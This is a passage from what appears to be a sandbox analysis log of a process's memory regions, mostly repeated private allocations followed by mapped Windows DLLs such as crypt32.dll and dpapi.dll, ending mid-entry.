"private_0x0000000000550000" filename = "" Region: id = 1702 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1703 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1704 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1705 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1706 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1707 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1708 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1709 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1710 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1711 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1712 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1713 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1714 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1715 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1716 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1717 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1718 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1719 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1720 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1721 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1722 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1723 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1724 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1725 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1726 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1727 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1728 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1729 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1730 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1731 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1732 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1733 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1734 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1735 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1736 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1737 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1738 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1739 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1740 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1741 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1742 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1743 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1744 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1745 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1746 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1747 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1748 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1749 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1750 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1751 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1752 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1753 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1754 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1755 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1756 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1757 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1758 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1759 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1760 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1761 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1762 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1763 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1764 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1765 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1766 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1767 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1768 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1769 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1770 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1771 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1772 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1773 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1774 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1775 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1776 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1777 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1778 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1779 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1780 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1781 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1782 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1783 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1784 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1785 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1786 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1787 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1788 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1789 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1790 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1791 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1792 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1793 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1794 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1796 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1797 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1798 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1799 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1800 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1801 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1802 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1803 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1804 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1805 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1806 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1807 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1808 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1809 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1810 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1811 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1812 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1813 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1814 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1815 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1816 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1817 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1818 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1819 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1820 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1821 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1822 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1823 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1824 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1825 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1826 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1827 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1828 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1829 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1830 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1831 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1832 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1833 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1834 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1835 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1836 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1837 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1838 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1839 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1840 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1841 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1842 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1843 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1844 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1845 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1846 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1847 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1848 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1849 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1850 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1851 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1852 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1853 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1854 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1855 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1856 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1857 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1858 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1859 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1860 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1861 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1862 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1863 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1864 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1865 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1866 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1867 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1868 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1869 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1870 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1871 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1872 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1873 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1874 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1875 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1876 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1877 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1878 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1879 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1880 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1881 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1882 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1883 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1884 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1885 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1886 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1887 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1888 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1889 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1890 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1891 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1892 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1893 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1894 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1895 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1896 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1897 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1898 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1899 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1900 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1901 start_va = 0x860000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1902 start_va = 0x76160000 end_va = 0x762d7fff monitored = 0 entry_point = 0x761b8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1903 start_va = 0x76c10000 end_va = 0x76c1dfff monitored = 0 entry_point = 0x76c15410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1907 start_va = 0x6fe60000 end_va = 0x6fe67fff monitored = 0 entry_point = 0x6fe61d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 1908 start_va = 0x8510000 end_va = 0x8710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008510000" filename = "" Region: id = 1909 start_va = 0x70040000 end_va = 0x700b4fff monitored = 0 entry_point = 0x70079a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1910 start_va = 0x8720000 end_va = 0x882ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008720000" filename = "" Region: id = 1911 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1912 start_va = 0x74360000 end_va = 0x743e3fff monitored = 0 entry_point = 0x74386220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: 